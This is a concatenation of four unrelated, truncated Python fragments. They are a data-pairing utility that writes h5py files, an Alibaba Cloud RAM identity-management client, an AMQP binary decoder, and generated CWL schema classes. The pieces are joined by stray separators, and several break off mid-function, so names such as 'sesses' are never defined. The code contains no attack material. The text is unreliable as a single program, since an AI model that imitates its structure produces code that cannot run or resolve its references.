pair_list_dic ={sess: gen_pair_list_func(sub_patients_dic[sess],int(num_pair_limit*max_ratio[sess])) for sess in sesses}
divided_path_and_name_dic = self.__gen_path_and_name_dic(pair_list_dic)
return (sub_folder_dic,divided_path_and_name_dic)
def save_pair_to_txt(self,info=None):
sub_folder_dic, divided_path_and_name_dic = info
if not self.saving_h5py:
saving_pair_info(sub_folder_dic, divided_path_and_name_dic)
else:
for sess in sesses:
h5py_output_root_path = sub_folder_dic[sess]
pair_path_list = [[os.path.join(h5py_output_root_path,get_file_name(fps[i])+'.h5py') for i in [0,1]] for fps in divided_path_and_name_dic['pair_path_list'][sess]]
divided_path_and_name_dic['pair_path_list'][sess] = pair_path_list
saving_pair_info(sub_folder_dic, divided_path_and_name_dic)
def save_pair_to_h5py(self,info=None):
sub_folder_dic, divided_path_and_name_dic =info
for sess in sesses:
self.pro_data_path = sub_folder_dic[sess]
pair_path_list_part = np.array_split(divided_path_and_name_dic['pair_path_list'][sess],number_of_workers)
with Pool(processes=number_of_workers) as pool:
pool.map(self.save_file_to_h5py, pair_path_list_part)
def save_file_to_h5py(self,info=None):
file_path_list = info
pbar = pb.ProgressBar(widgets=[pb.Percentage(), pb.Bar(), pb.ETA()], maxval=len(file_path_list)).start()
for i, fps in enumerate(file_path_list):
for j | |
# encoding: utf-8
"""
Represents a connection to the RAM service.
"""
import six
from footmark.connection import ACSQueryConnection
from footmark.ram.group import Group
from footmark.ram.loginprofile import LoginProfile
from footmark.ram.mfadevice import MfaDevice
from footmark.ram.policy import Policy
from footmark.ram.policyversion import PolicyVersion
from footmark.ram.regioninfo import RegionInfo
from footmark.exception import RamResponseError
from footmark.ram.role import Role
from footmark.ram.user import User
from footmark.resultset import ResultSet
from footmark.ram.accesskey import AccessKey
class RAMConnection(ACSQueryConnection):
SDKVersion = '2015-05-01'
DefaultRegionId = 'cn-hangzhou'
DefaultRegionName = u'杭州'.encode("UTF-8")
RamResponseError = RamResponseError
def __init__(self, acs_access_key_id=None, acs_secret_access_key=None,
region=None, sdk_version=None, security_token=None, user_agent=None):
"""
Init method to create a new connection to RAM.
"""
if not region:
region = RegionInfo(self, self.DefaultRegionName,
self.DefaultRegionId)
self.region = region
if sdk_version:
self.SDKVersion = sdk_version
self.RAMSDK = 'aliyunsdkram.request.v' + self.SDKVersion.replace('-', '')
super(RAMConnection, self).__init__(acs_access_key_id,
acs_secret_access_key,
self.region, self.RAMSDK, security_token, user_agent=user_agent)
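    # Hedged usage sketch (the credentials are placeholders, not part of this module):
    #   conn = RAMConnection(acs_access_key_id='<access-key-id>',
    #                        acs_secret_access_key='<access-key-secret>')
    #   users = conn.list_user()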
def create_access_key(self, user_name):
"""
add access_key for user
:type user_name: str
:param user_name: the name of user
:rtype: object
:return: Returns a <footmark.ram.accesskey> object.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
return self.get_object('CreateAccessKey', params, AccessKey)
def update_access_key(self, user_name, access_key_id, is_active=None):
"""
update access_key for user
:type user_name: str
        :param user_name: the name of user
        :type access_key_id: str
        :param access_key_id: the id of the access key to update
:type is_active: bool
:param is_active: the status of accesskey
:rtype: bool
:return: The result of update access_key.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
self.build_list_params(params, access_key_id, 'UserAccessKeyId')
if is_active is True:
self.build_list_params(params, 'Active', 'Status')
else:
self.build_list_params(params, 'Inactive', 'Status')
return self.get_status('UpdateAccessKey', params)
def delete_access_key(self, user_name, access_key_id):
"""
delete access_key of user
:type user_name: str
:param user_name: the name of user
:type access_key_id: str
:param access_key_id: The access_key to delete
:rtype: bool
:return: The result of deleting access_key.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
self.build_list_params(params, access_key_id, 'UserAccessKeyId')
return self.get_status('DeleteAccessKey', params)
def list_access_keys(self, user_name):
"""
        Retrieve all the access keys associated with your account.
:type user_name: str
:param user_name: User name of access_key
:rtype: list
:return: A list of :class:`footmark.ram.accesskey`
"""
params = {}
if user_name:
self.build_list_params(params, user_name, 'UserName')
return self.get_list('ListAccessKeys', params, ['AccessKeys', AccessKey])
def create_user(self, user_name, display_name=None, phone=None, email=None, comments=None):
"""
create user
:type user_name: str
:param user_name: The name of user
:type display_name: str
:param display_name: The display name of user
:type phone: str
:param phone: The phone of user
:type email: str
:param email: The email of user
:type comments: str
:param comments: The comments about user
:rtype: object
:return: Returns a <footmark.ram.user> object.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
if display_name:
self.build_list_params(params, display_name, 'DisplayName')
if phone:
self.build_list_params(params, phone, 'MobilePhone')
if email:
self.build_list_params(params, email, 'Email')
if comments:
self.build_list_params(params, comments, 'Comments')
return self.get_object('CreateUser', params, User)
def get_user(self, user_name):
"""
get user
:type user_name: str
:param user_name: The name of user
:rtype: object
:return: Returns a <footmark.ram.user> object.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
return self.get_object('GetUser', params, User)
def update_user(self, user_name, new_display_name=None, new_user_name=None, new_phone=None, new_email=None, new_comments=None):
"""
update user's info
:type user_name: str
:param user_name: The name of user
:type new_user_name: str
:param new_user_name: The new name of user
:type new_display_name: str
:param new_display_name: The new display name of user
:type new_phone: str
:param new_phone: The new phone of user
:type new_email: str
:param new_email: The new email of user
:type new_comments: str
:param new_comments: The new comments about user
:rtype: bool
:return: The result of update user.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
if new_user_name:
self.build_list_params(params, new_user_name, 'NewUserName')
if new_display_name:
self.build_list_params(params, new_display_name, 'NewDisplayName')
if new_phone:
self.build_list_params(params, new_phone, 'NewMobilePhone')
if new_email:
self.build_list_params(params, new_email, 'NewEmail')
if new_comments:
self.build_list_params(params, new_comments, 'NewComments')
return self.get_status('UpdateUser', params)
def list_user(self):
"""
Retrieve all the users associated with your account.
:rtype: list
:return: A list of :class:`footmark.ram.user`
"""
return self.get_list('ListUsers', None, ['Users', User])
def delete_user(self, user_name):
"""
delete user
:type user_name: str
:param user_name: the name of user
:rtype: bool
:return: The result of deleting user.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
return self.get_status('DeleteUser', params)
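    # Hedged example of a typical user lifecycle with the methods above (the user name
    # and email are placeholders):
    #   conn.create_user('alice', display_name='Alice')
    #   conn.update_user('alice', new_email='alice@example.com')
    #   conn.delete_user('alice')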
def create_role(self, role_name, policy_doc, description=None):
"""
create role
:type role_name: str
:param role_name: The name of role
:type policy_doc: str
:param policy_doc: The policy document to assume role
:type description: str
:param description: The description of role
:rtype: object
:return: Returns a <footmark.ram.role> object.
"""
params = {}
self.build_list_params(params, role_name, 'RoleName')
self.build_list_params(params, policy_doc, 'AssumeRolePolicyDocument')
if description:
self.build_list_params(params, description, 'Description')
return self.get_object('CreateRole', params, Role)
def get_role(self, role_name):
"""
get role
:type role_name: str
:param role_name: The name of role
:rtype: object
:return: Returns a <footmark.ram.role> object.
"""
params = {}
self.build_list_params(params, role_name, 'RoleName')
return self.get_object('GetRole', params, Role)
def update_role(self, role_name, new_policy_doc=None):
"""
update role's info
:type role_name: str
        :param role_name: The name of role
:type new_policy_doc: str
:param new_policy_doc: The new policy of role
:rtype: bool
:return: The result of update role.
"""
params = {}
self.build_list_params(params, role_name, 'RoleName')
if new_policy_doc:
self.build_list_params(params, new_policy_doc, 'NewAssumeRolePolicyDocument')
return self.get_status('UpdateRole', params)
def list_role(self):
"""
        Retrieve all the roles associated with your account.
:rtype: list
:return: A list of :class:`footmark.ram.role`
"""
return self.get_list('ListRoles', None, ['Roles', Role])
def delete_role(self, role_name):
"""
delete role
:type role_name: str
:param role_name: the name of role
:rtype: bool
:return: The result of deleting role.
"""
params = {}
self.build_list_params(params, role_name, 'RoleName')
return self.get_status('DeleteRole', params)
def create_group(self, group_name, comments=None):
"""
create group
:type group_name: str
:param group_name: The name of group
:type comments: str
:param comments: The description of group
:rtype: object
:return: Returns a <footmark.ram.group> object.
"""
params = {}
self.build_list_params(params, group_name, 'GroupName')
if comments:
self.build_list_params(params, comments, 'Comments')
return self.get_object('CreateGroup', params, Group)
def get_group(self, group_name):
"""
get group
:type group_name: str
:param group_name: The name of group
:rtype: object
        :return: Returns a <footmark.ram.group> object.
"""
params = {}
self.build_list_params(params, group_name, 'GroupName')
return self.get_object('GetGroup', params, Group)
def update_group(self, group_name, new_group_name=None, new_comments=None):
"""
update group's info
:type group_name: str
:param group_name: The name of group
:type new_group_name: str
:param new_group_name: The new name of group
:type new_comments: str
:param new_comments: The new comments of group
:rtype: bool
:return: The result of update group.
"""
params = {}
self.build_list_params(params, group_name, 'GroupName')
if new_group_name:
self.build_list_params(params, new_group_name, 'NewGroupName')
if new_comments:
self.build_list_params(params, new_comments, 'NewComments')
return self.get_status('UpdateGroup', params)
def list_group(self):
"""
        Retrieve all the groups associated with your account.
:rtype: list
:return: A list of :class:`footmark.ram.group`
"""
return self.get_list('ListGroups', None, ['Groups', Group])
def delete_group(self, group_name):
"""
delete group
:type group_name: str
:param group_name: the name of group
:rtype: bool
:return: The result of deleting group.
"""
params = {}
self.build_list_params(params, group_name, 'GroupName')
return self.get_status('DeleteGroup', params)
def create_login_profile(self, user_name, pwd, pwd_reset_req=None, mfa_req=None):
"""
create login_profile
:type user_name: str
:param user_name: The name of user
:type pwd: str
:param pwd: <PASSWORD> <PASSWORD>
:type pwd_reset_req: bool
        :param pwd_reset_req: Whether the user must reset the password; the default value is false.
:type mfa_req: bool
        :param mfa_req: Whether the user must bind an MFA device; the default value is false.
:rtype: object
:return: Returns a <footmark.ram.loginprofile> object.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
self.build_list_params(params, pwd, 'Password')
        # send the flags explicitly; previously a True value was silently dropped, so
        # pwd_reset_req/mfa_req could never be enabled at creation time
        self.build_list_params(params, pwd_reset_req is True, 'PasswordResetRequired')
        self.build_list_params(params, mfa_req is True, 'MFABindRequired')
return self.get_object('CreateLoginProfile', params, LoginProfile)
def get_login_profile(self, user_name):
"""
get login_profile
:type user_name: str
:param user_name: The name of user
:rtype: object
:return: Returns a <footmark.ram.loginprofile> object.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
return self.get_object('GetLoginProfile', params, LoginProfile)
def update_login_profile(self, user_name, pwd=None, pwd_reset_req=None, mfa_req=None):
"""
update login_profile's info
:type user_name: str
:param user_name: The name of user
:type pwd: str
:param pwd: The <PASSWORD> user
:type pwd_reset_req: bool
        :param pwd_reset_req: Whether the user must reset the password; the default value is false.
:type mfa_req: bool
        :param mfa_req: Whether the user must bind an MFA device; the default value is false.
:rtype: bool
:return: The result of update group.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
if pwd:
self.build_list_params(params, pwd, 'Password')
if pwd_reset_req is not None:
self.build_list_params(params, pwd_reset_req, 'PasswordResetRequired')
if mfa_req is not None:
self.build_list_params(params, mfa_req, 'MFABindRequired')
return self.get_status('UpdateLoginProfile', params)
def delete_login_profile(self, user_name):
"""
delete login_profile
:type user_name: str
:param user_name: the name of user
:rtype: bool
:return: The result of deleting login_profile of user.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
return self.get_status('DeleteLoginProfile', params)
def create_mfa_device(self, mfa_name):
"""
create mfa_device
:type mfa_name: str
| |
<gh_stars>1-10
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
# pylint: disable=redefined-builtin
import struct
import uuid
from io import BytesIO
import logging
from typing import Iterable, Union, Tuple, Dict # pylint: disable=unused-import
from pyamqp1.amqptypes import FieldDefinition, ObjDefinition, ConstructorBytes
from pyamqp1.definitions import _FIELD_DEFINITIONS
from pyamqp1.error import AMQPError
from pyamqp1.performatives import (
Performative,
HeaderFrame,
TLSHeaderFrame,
SASLHeaderFrame,
OpenFrame,
BeginFrame,
AttachFrame,
FlowFrame,
TransferFrame,
DispositionFrame,
DetachFrame,
EndFrame,
CloseFrame,
SASLMechanism,
SASLInit,
SASLChallenge,
SASLResponse,
SASLOutcome)
from pyamqp1.endpoints import Source, Target
from pyamqp1.message import AnnotatedMessage, Header, Properties
from pyamqp1.outcomes import (
Received,
Accepted,
Rejected,
Released,
Modified,
)
_LOGGER = logging.getLogger(__name__)
_MESSAGE_PERFORMATIVES = [Header, Properties]
PERFORMATIVES = {
0x00000010: OpenFrame,
0x00000011: BeginFrame,
0x00000012: AttachFrame,
0x00000013: FlowFrame,
0x00000014: TransferFrame,
0x00000015: DispositionFrame,
0x00000016: DetachFrame,
0x00000017: EndFrame,
0x00000018: CloseFrame,
0x00000040: SASLMechanism,
0x00000041: SASLInit,
0x00000042: SASLChallenge,
0x00000043: SASLResponse,
0x00000044: SASLOutcome
}
COMPOSITES = {
0x00000023: Received,
0x00000024: Accepted,
0x00000025: Rejected,
0x00000026: Released,
0x00000027: Modified,
0x00000028: Source,
0x00000029: Target,
0x0000001d: AMQPError,
}
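# Note: incoming descriptor codes are resolved back to their frame/outcome classes via
# these lookup tables, e.g. PERFORMATIVES[0x00000010] is OpenFrame and
# COMPOSITES[0x00000024] is Accepted.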
class DecoderState(object): # pylint: disable=no-init
constructor = 'CONSTRUCTOR'
type_data = 'TYPE_DATA'
done = 'DONE'
class Decoder(object):
def __init__(self, length):
self.state = DecoderState.constructor
self.bytes_remaining = length
self.decoded_value = {}
self.constructor_byte = None
def still_working(self):
if self.bytes_remaining is None:
return self.state != DecoderState.done
return self.bytes_remaining > 0
def progress(self, num_bytes):
if self.bytes_remaining is None:
return
if self.bytes_remaining - num_bytes < 0:
raise ValueError("Buffer bytes exhausted.")
self.bytes_remaining -= num_bytes
def decode_constructor(decoder):
# type: (Decoder) -> None
if decoder.constructor_byte == ConstructorBytes.null:
decoder.decoded_value = None
decoder.state = DecoderState.done
elif decoder.constructor_byte == ConstructorBytes.bool_true:
decoder.decoded_value = True
decoder.state = DecoderState.done
elif decoder.constructor_byte == ConstructorBytes.bool_false:
decoder.decoded_value = False
decoder.state = DecoderState.done
elif decoder.constructor_byte in [ConstructorBytes.uint_0, ConstructorBytes.ulong_0]:
decoder.decoded_value = 0
decoder.state = DecoderState.done
else:
decoder.state = DecoderState.type_data
def _read(buffer, size):
# type: (IO, int) -> bytes
data = buffer.read(size)
if data == b'' or len(data) != size:
raise ValueError("Buffer exhausted. Read {}, Length: {}".format(data, len(data)))
return data
def decode_boolean(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 1)
if data == b'\x00':
decoder.decoded_value = False
elif data == b'\x01':
decoder.decoded_value = True
else:
raise ValueError("Invalid boolean value: {}".format(data))
decoder.progress(1)
decoder.state = DecoderState.done
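# Illustrative trace (the input bytes are assumed, not produced by this module): decoding
# a single boolean payload byte with the helper above:
#   decoder = Decoder(length=1)
#   decode_boolean(decoder, BytesIO(b'\x01'))
#   decoder.decoded_value  # -> True, and decoder.state == DecoderState.done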
def decode_ubyte(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 1)
try:
decoder.decoded_value = struct.unpack('>B', data)[0]
except Exception:
raise ValueError("Invalid ubyte value: {}".format(data))
decoder.progress(1)
decoder.state = DecoderState.done
def decode_ushort(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 2)
try:
decoder.decoded_value = struct.unpack('>H', data)[0]
except Exception:
raise ValueError("Invalid ushort value: {}".format(data))
decoder.progress(2)
decoder.state = DecoderState.done
def decode_uint_small(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 1)
try:
decoder.decoded_value = struct.unpack('>B', data)[0]
except Exception:
raise ValueError("Invalid uint value: {}".format(data))
decoder.progress(1)
decoder.state = DecoderState.done
def decode_uint_large(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 4)
try:
decoder.decoded_value = struct.unpack('>I', data)[0]
except Exception:
raise ValueError("Invalid uint value: {}".format(data))
decoder.progress(4)
decoder.state = DecoderState.done
def decode_ulong_small(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 1)
try:
decoder.decoded_value = struct.unpack('>B', data)[0]
except Exception:
raise ValueError("Invalid ulong value: {}".format(data))
decoder.progress(1)
decoder.state = DecoderState.done
def decode_ulong_large(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 8)
try:
decoder.decoded_value = struct.unpack('>Q', data)[0]
except Exception:
raise ValueError("Invalid ulong value: {}".format(data))
decoder.progress(8)
decoder.state = DecoderState.done
def decode_byte(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 1)
try:
decoder.decoded_value = struct.unpack('>b', data)[0]
except Exception:
raise ValueError("Invalid byte value: {}".format(data))
decoder.progress(1)
decoder.state = DecoderState.done
def decode_short(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 2)
try:
decoder.decoded_value = struct.unpack('>h', data)[0]
except Exception:
raise ValueError("Invalid short value: {}".format(data))
decoder.progress(2)
decoder.state = DecoderState.done
def decode_int_small(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 1)
try:
decoder.decoded_value = struct.unpack('>b', data)[0]
except Exception:
raise ValueError("Invalid int value: {}".format(data))
decoder.progress(1)
decoder.state = DecoderState.done
def decode_int_large(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 4)
try:
decoder.decoded_value = struct.unpack('>i', data)[0]
except Exception:
raise ValueError("Invalid int value: {}".format(data))
decoder.progress(4)
decoder.state = DecoderState.done
def decode_long_small(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 1)
try:
decoder.decoded_value = struct.unpack('>b', data)[0]
except Exception:
raise ValueError("Invalid long value: {}".format(data))
decoder.progress(1)
decoder.state = DecoderState.done
def decode_long_large(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 8)
try:
decoder.decoded_value = struct.unpack('>q', data)[0]
except Exception:
raise ValueError("Invalid long value: {}".format(data))
decoder.progress(8)
decoder.state = DecoderState.done
def decode_float(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 4)
try:
decoder.decoded_value = struct.unpack('>f', data)[0]
except Exception:
raise ValueError("Invalid float value: {}".format(data))
decoder.progress(4)
decoder.state = DecoderState.done
def decode_double(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 8)
try:
decoder.decoded_value = struct.unpack('>d', data)[0]
except Exception:
raise ValueError("Invalid double value: {}".format(data))
decoder.progress(8)
decoder.state = DecoderState.done
def decode_timestamp(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 8)
try:
decoder.decoded_value = struct.unpack('>q', data)[0] # TODO: datetime
except Exception:
raise ValueError("Invalid timestamp value: {}".format(data))
decoder.progress(8)
decoder.state = DecoderState.done
def decode_uuid(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 16)
try:
decoder.decoded_value = uuid.UUID(bytes=data)
except Exception:
raise ValueError("Invalid UUID value: {}".format(data))
decoder.progress(16)
decoder.state = DecoderState.done
def decode_binary_small(decoder, buffer):
# type: (Decoder, IO) -> None
length = struct.unpack('>B', _read(buffer, 1))[0]
decoder.progress(1)
if length == 0:
decoder.decoded_value = None
else:
data = _read(buffer, length)
try:
decoder.decoded_value = data
except Exception:
raise ValueError("Error reading binary data: {}".format(data))
decoder.progress(length)
decoder.state = DecoderState.done
def decode_binary_large(decoder, buffer):
# type: (Decoder, IO) -> None
length = struct.unpack('>L', _read(buffer, 4))[0]
decoder.progress(4)
if length == 0:
decoder.decoded_value = None
else:
data = _read(buffer, length)
try:
decoder.decoded_value = data
except Exception:
raise ValueError("Error reading binary data: {}".format(data))
decoder.progress(length)
decoder.state = DecoderState.done
def decode_string_small(decoder, buffer):
# type: (Decoder, IO) -> None
length = struct.unpack('>B', _read(buffer, 1))[0]
data = _read(buffer, length)
try:
decoder.decoded_value = data.decode('utf-8')
except Exception:
raise ValueError("Error reading string data: {}".format(data))
decoder.progress(1)
decoder.progress(length)
decoder.state = DecoderState.done
def decode_string_large(decoder, buffer):
# type: (Decoder, IO) -> None
length = struct.unpack('>L', _read(buffer, 4))[0]
data = _read(buffer, length)
try:
decoder.decoded_value = data.decode('utf-8')
except Exception:
raise ValueError("Error reading string data: {}".format(data))
decoder.progress(4)
decoder.progress(length)
decoder.state = DecoderState.done
def decode_symbol_small(decoder, buffer):
# type: (Decoder, IO) -> None
length = struct.unpack('>B', _read(buffer, 1))[0]
data = _read(buffer, length)
try:
decoder.decoded_value = data
except Exception:
raise ValueError("Error reading symbol data: {}".format(data))
decoder.progress(1)
decoder.progress(length)
decoder.state = DecoderState.done
def decode_symbol_large(decoder, buffer):
# type: (Decoder, IO) -> None
length = struct.unpack('>L', _read(buffer, 4))[0]
data = _read(buffer, length)
try:
decoder.decoded_value = data
except Exception:
raise ValueError("Error reading symbol data: {}".format(data))
decoder.progress(4)
decoder.progress(length)
decoder.state = DecoderState.done
def decode_empty_list(decoder, buffer):
# type: (Decoder, IO) -> None
decoder.decoded_value = []
decoder.state = DecoderState.done
def decode_list_small(decoder, buffer):
# type: (Decoder, IO) -> None
try:
size = struct.unpack('>B', _read(buffer, 1))[0]
count = struct.unpack('>B', _read(buffer, 1))[0]
items = decode_value(buffer, length_bytes=size - 1, count=count)
decoder.decoded_value = items
decoder.progress(2)
decoder.progress(size - 1)
except ValueError:
raise
except Exception:
raise ValueError("Error decoding small list.")
decoder.state = DecoderState.done
def decode_list_large(decoder, buffer):
# type: (Decoder, IO) -> None
try:
size = struct.unpack('>L', _read(buffer, 4))[0]
count = struct.unpack('>L', _read(buffer, 4))[0]
items = decode_value(buffer, length_bytes=size - 4, count=count)
decoder.decoded_value = items
decoder.progress(8)
decoder.progress(size - 4)
except ValueError:
raise
except Exception:
raise ValueError("Error decoding large list.")
decoder.state = DecoderState.done
def decode_map_small(decoder, buffer):
# type: (Decoder, IO) -> None
try:
size = struct.unpack('>B', _read(buffer, 1))[0]
count = struct.unpack('>B', _read(buffer, 1))[0]
items = decode_value(buffer, length_bytes=size - 1, count=count)
decoder.decoded_value = [(items[i], items[i+1]) for i in range(0, len(items), 2)]
decoder.progress(2)
decoder.progress(size - 1)
except ValueError:
raise
except Exception:
raise ValueError("Error decoding small map.")
decoder.state = DecoderState.done
def decode_map_large(decoder, buffer):
# type: (Decoder, IO) -> None
try:
size = struct.unpack('>L', _read(buffer, 4))[0]
count = struct.unpack('>L', _read(buffer, 4))[0]
items = decode_value(buffer, length_bytes=size - 4, count=count)
decoder.decoded_value = [(items[i], items[i+1]) for i in range(0, len(items), 2)]
decoder.progress(8)
decoder.progress(size - 4)
except ValueError:
raise
except Exception:
raise ValueError("Error decoding large map.")
decoder.state = DecoderState.done
def decode_array_small(decoder, buffer):
# type: (Decoder, IO) -> None
try:
size = struct.unpack('>B', _read(buffer, 1))[0]
count = struct.unpack('>B', _read(buffer, 1))[0]
items = decode_value(buffer, length_bytes=size - 1, sub_constructors=False, count=count)
decoder.decoded_value = items
decoder.progress(2)
decoder.progress(size - 1)
except ValueError:
raise
except Exception:
raise ValueError("Error decoding small array.")
decoder.state = DecoderState.done
def decode_array_large(decoder, buffer):
# type: (Decoder, IO) -> None
try:
size = struct.unpack('>L', _read(buffer, 4))[0]
count = struct.unpack('>L', _read(buffer, 4))[0]
items = decode_value(buffer, length_bytes=size - 4, sub_constructors=False, count=count)
decoder.decoded_value = items
| |
if top:
if self.loadingOptions.namespaces:
r["$namespaces"] = self.loadingOptions.namespaces
if self.loadingOptions.schemas:
r["$schemas"] = self.loadingOptions.schemas
return r
attrs = frozenset(
[
"label",
"secondaryFiles",
"streamable",
"doc",
"id",
"outputBinding",
"format",
]
)
class ProcessRequirement(Savable):
"""
A process requirement declares a prerequisite that may or must be fulfilled
before executing a process. See [`Process.hints`](#process) and
[`Process.requirements`](#process).
Process requirements are the primary mechanism for specifying extensions to
the CWL core specification.
"""
pass
class Process(Savable):
"""
The base executable type in CWL is the `Process` object defined by the
document. Note that the `Process` object is abstract and cannot be
directly executed.
"""
pass
class InlineJavascriptRequirement(ProcessRequirement):
"""
Indicates that the workflow platform must support inline Javascript expressions.
If this requirement is not present, the workflow platform must not perform expression
    interpolation.
"""
def __init__(
self,
expressionLib: Optional[Any] = None,
extension_fields: Optional[Dict[str, Any]] = None,
loadingOptions: Optional[LoadingOptions] = None,
) -> None:
if extension_fields:
self.extension_fields = extension_fields
else:
self.extension_fields = CommentedMap()
if loadingOptions:
self.loadingOptions = loadingOptions
else:
self.loadingOptions = LoadingOptions()
self.class_ = "InlineJavascriptRequirement"
self.expressionLib = expressionLib
@classmethod
def fromDoc(
cls,
doc: Any,
baseuri: str,
loadingOptions: LoadingOptions,
docRoot: Optional[str] = None,
) -> "InlineJavascriptRequirement":
_doc = copy.copy(doc)
if hasattr(doc, "lc"):
_doc.lc.data = doc.lc.data
_doc.lc.filename = doc.lc.filename
_errors__ = []
if _doc.get("class") != "InlineJavascriptRequirement":
raise ValidationException("Not a InlineJavascriptRequirement")
if "expressionLib" in _doc:
try:
expressionLib = load_field(
_doc.get("expressionLib"),
union_of_None_type_or_array_of_strtype,
baseuri,
loadingOptions,
)
except ValidationException as e:
_errors__.append(
ValidationException(
"the `expressionLib` field is not valid because:",
SourceLine(_doc, "expressionLib", str),
[e],
)
)
else:
expressionLib = None
extension_fields: Dict[str, Any] = {}
for k in _doc.keys():
if k not in cls.attrs:
if ":" in k:
ex = expand_url(
k, "", loadingOptions, scoped_id=False, vocab_term=False
)
extension_fields[ex] = _doc[k]
else:
_errors__.append(
ValidationException(
"invalid field `{}`, expected one of: `class`, `expressionLib`".format(
k
),
SourceLine(_doc, k, str),
)
)
break
if _errors__:
raise ValidationException(
"Trying 'InlineJavascriptRequirement'", None, _errors__
)
return cls(
expressionLib=expressionLib,
extension_fields=extension_fields,
loadingOptions=loadingOptions,
)
def save(
self, top: bool = False, base_url: str = "", relative_uris: bool = True
) -> Dict[str, Any]:
r: Dict[str, Any] = {}
for ef in self.extension_fields:
r[prefix_url(ef, self.loadingOptions.vocab)] = self.extension_fields[ef]
r["class"] = "InlineJavascriptRequirement"
if self.expressionLib is not None:
r["expressionLib"] = save(
self.expressionLib,
top=False,
base_url=base_url,
relative_uris=relative_uris,
)
# top refers to the directory level
if top:
if self.loadingOptions.namespaces:
r["$namespaces"] = self.loadingOptions.namespaces
if self.loadingOptions.schemas:
r["$schemas"] = self.loadingOptions.schemas
return r
attrs = frozenset(["class", "expressionLib"])
class SchemaDefRequirement(ProcessRequirement):
"""
This field consists of an array of type definitions which must be used when
interpreting the `inputs` and `outputs` fields. When a `type` field
    contains an IRI, the implementation must check if the type is defined in
`schemaDefs` and use that definition. If the type is not found in
`schemaDefs`, it is an error. The entries in `schemaDefs` must be
processed in the order listed such that later schema definitions may refer
to earlier schema definitions.
"""
def __init__(
self,
types: Any,
extension_fields: Optional[Dict[str, Any]] = None,
loadingOptions: Optional[LoadingOptions] = None,
) -> None:
if extension_fields:
self.extension_fields = extension_fields
else:
self.extension_fields = CommentedMap()
if loadingOptions:
self.loadingOptions = loadingOptions
else:
self.loadingOptions = LoadingOptions()
self.class_ = "SchemaDefRequirement"
self.types = types
@classmethod
def fromDoc(
cls,
doc: Any,
baseuri: str,
loadingOptions: LoadingOptions,
docRoot: Optional[str] = None,
) -> "SchemaDefRequirement":
_doc = copy.copy(doc)
if hasattr(doc, "lc"):
_doc.lc.data = doc.lc.data
_doc.lc.filename = doc.lc.filename
_errors__ = []
if _doc.get("class") != "SchemaDefRequirement":
raise ValidationException("Not a SchemaDefRequirement")
try:
types = load_field(
_doc.get("types"),
array_of_union_of_InputRecordSchemaLoader_or_InputEnumSchemaLoader_or_InputArraySchemaLoader,
baseuri,
loadingOptions,
)
except ValidationException as e:
_errors__.append(
ValidationException(
"the `types` field is not valid because:",
SourceLine(_doc, "types", str),
[e],
)
)
extension_fields: Dict[str, Any] = {}
for k in _doc.keys():
if k not in cls.attrs:
if ":" in k:
ex = expand_url(
k, "", loadingOptions, scoped_id=False, vocab_term=False
)
extension_fields[ex] = _doc[k]
else:
_errors__.append(
ValidationException(
"invalid field `{}`, expected one of: `class`, `types`".format(
k
),
SourceLine(_doc, k, str),
)
)
break
if _errors__:
raise ValidationException("Trying 'SchemaDefRequirement'", None, _errors__)
return cls(
types=types,
extension_fields=extension_fields,
loadingOptions=loadingOptions,
)
def save(
self, top: bool = False, base_url: str = "", relative_uris: bool = True
) -> Dict[str, Any]:
r: Dict[str, Any] = {}
for ef in self.extension_fields:
r[prefix_url(ef, self.loadingOptions.vocab)] = self.extension_fields[ef]
r["class"] = "SchemaDefRequirement"
if self.types is not None:
r["types"] = save(
self.types, top=False, base_url=base_url, relative_uris=relative_uris
)
# top refers to the directory level
if top:
if self.loadingOptions.namespaces:
r["$namespaces"] = self.loadingOptions.namespaces
if self.loadingOptions.schemas:
r["$schemas"] = self.loadingOptions.schemas
return r
attrs = frozenset(["class", "types"])
class EnvironmentDef(Savable):
"""
Define an environment variable that will be set in the runtime environment
by the workflow platform when executing the command line tool. May be the
result of executing an expression, such as getting a parameter from input.
"""
def __init__(
self,
envName: Any,
envValue: Any,
extension_fields: Optional[Dict[str, Any]] = None,
loadingOptions: Optional[LoadingOptions] = None,
) -> None:
if extension_fields:
self.extension_fields = extension_fields
else:
self.extension_fields = CommentedMap()
if loadingOptions:
self.loadingOptions = loadingOptions
else:
self.loadingOptions = LoadingOptions()
self.envName = envName
self.envValue = envValue
@classmethod
def fromDoc(
cls,
doc: Any,
baseuri: str,
loadingOptions: LoadingOptions,
docRoot: Optional[str] = None,
) -> "EnvironmentDef":
_doc = copy.copy(doc)
if hasattr(doc, "lc"):
_doc.lc.data = doc.lc.data
_doc.lc.filename = doc.lc.filename
_errors__ = []
try:
envName = load_field(
_doc.get("envName"),
strtype,
